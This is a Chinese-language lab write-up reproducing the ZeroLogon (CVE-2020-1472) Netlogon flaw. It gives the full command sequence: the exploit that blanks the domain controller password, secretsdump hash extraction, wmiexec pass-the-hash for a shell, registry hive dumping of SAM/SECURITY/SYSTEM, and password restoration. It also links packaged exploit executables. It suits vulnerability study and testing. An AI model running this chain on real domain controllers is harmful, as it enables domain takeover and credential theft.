ZeroLogon (CVE-2020-1472)复现

0x01 漏洞简介

2020年08月12日,Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020-1472
漏洞等级:严重
漏洞评分:10分
攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序

0x02 漏洞影响

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

0x03 复现环境

域控
IP: 10.12.0.128
Hostname: WIN-4VARJE0QP69
Domain: local.me

0x04 利用工具

https://github.com/VoidSec/CVE-2020-1472
https://github.com/SecureAuthCorp/impacket
https://github.com/DeEpinGh0st/HiveJack-Console

0x05 漏洞复现

运行cve-2020-1472-exploit.py并指定域控ip和主机名

cve-2020-1472-exploit.exe -t 10.12.0.128 -n WIN-4VARJE0QP69


原仓库为python脚本,这里使用的是用pyinstaller打包后的exe版本
执行后域控的机器账号密码会在进行置空
使用impacket的secretsdump读取域控上的hash

secretsdump.exe local.me/WIN-4VARJE0QP69$@10.12.0.128 -no-pass


同样使用的是打包的版本
可以看到域控密码已置空,此时可以对域控账户进行hash的破解,登录RDP。或者使用wmiexec等远程执行shell

wmiexec.exe -hashes aad3b435b51404eeaad3b435b51404ee:570a9a65db8fba761c1008a51d4c95ab local.me/administrator@10.12.0.128


同样使用的是打包的版本

0x06 恢复密码

由于此漏洞会置空域控机器账户密码,如果机器账户hash长时间为空,可能会导致脱域。因此拿到权限后需要把hash重置回去
在wmiexec的shell中执行

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save

如果域控在可以出网的情况下可以使用HiveJack-Console对注册表进行快速导出
之后可以使用cs等其他方式将保存的文件下载到本地,使用secretsdump读取原始密码

其中$MACHINE.ACC为域控原始密码,然后使用reinstall_original_pw.py对域控密码进行恢复

reinstall_original_pw.exe WIN-4VARJE0QP69 10.12.0.128 c7a435fe95a39a971669d995ba2e5519


恢复后再次使用secretsdump读取hash,失败则说明恢复成功

0x07 打包工具下载

https://github.com/DeEpinGh0st/Gadgets